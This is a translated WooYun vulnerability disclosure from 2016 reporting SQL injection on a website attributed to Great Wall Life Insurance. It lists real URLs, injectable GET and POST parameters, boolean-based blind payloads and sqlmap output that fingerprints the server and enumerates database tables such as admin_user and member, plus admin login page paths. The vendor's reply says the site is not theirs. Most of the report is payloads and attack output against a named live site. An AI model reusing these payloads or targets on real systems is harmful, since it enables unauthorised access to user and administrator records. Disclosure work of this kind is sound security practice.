Vulnerability summary

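Bug ID: wooyun-2016-0171598

Title: SQL injection vulnerability on the main site of Great Wall Life Insurance (长城人寿保险公司)

Vendor: Great Wall Life Insurance Co., Ltd. (长城人寿保险股份有限公司)

Author: 路人甲

Submitted: 2016-01-21 11:34

Fixed: 2016-01-21 16:06

Disclosed: 2016-01-21 16:06

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 7

Status: The vendor has been notified of the vulnerability but has ignored it

Source: http://www.wooyun.org. For questions or help, please contact [email protected]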

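Vulnerability details

Disclosure status:

2016-01-21: Details sent to the vendor; awaiting vendor handling
2016-01-21: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

What actually puzzles me is that the main site itself has an injection, so why has nobody reported it = =, is it because it's too weak?

Detailed description:

There are many more injection points; here are two examples.
url1: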

http://www.ccib.com.cn/CHN/Home/HomeShow.asp?ContentID=4076


sqlmap identified the following injection point(s) with a total of 125 HTTP(s) requests:
---
Parameter: ContentID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ContentID=4076 AND 6958=6958
Vector: AND [INFERENCE]
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ContentID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ContentID=4076 AND 6958=6958
Vector: AND [INFERENCE]
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[9 tables]
+------------+
| admin_user |
| area |
| branch |
| company |
| exam |
| guestbook |
| job |
| member |
| news |
+------------+


Database: Microsoft_Access_masterdb
+------------+---------+
| Table | Entries |
+------------+---------+
| member | 2829 |
| news | 392 |
| guestbook | 382 |
| job | 98 |
| area | 34 |
| branch | 28 |
| exam | 19 |
| company | 11 |
| admin_user | 6 |
+------------+---------+


Proof of vulnerability:

url2:

http://www.ccib.com.cn:80/CHN/forum/admin/Default.asp?action=loginok (POST)
UserName=admin*&Password=admin&CheckCode=2972&Submit.x=47&Submit.y=26


sqlmap identified the following injection point(s) with a total of 133 HTTP(s) requests:
---
Parameter: UserName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: UserName=admin' AND 3572=3572 AND 'rbop'='rbop&Password=admin&CheckCode=2972&Submit.x=47&Submit.y=26
Vector: AND [INFERENCE]
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[2 tables]
+------+
| book |
| news |
+------+


3. Sensitive pages
http://www.ccib.com.cn/CHN/Web/Default.asp
http://www.ccib.com.cn/adm_login.asp

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin_user
[6 entries]


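Being logged in is no different from not being logged in, because it's of no damn use - -,

Fix:

Filtering

Copyright notice: when reposting, please credit the source 路人甲@WooYun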


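Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2016-01-21 16:06

Vendor reply:

Not our company's site

Latest status:

None yet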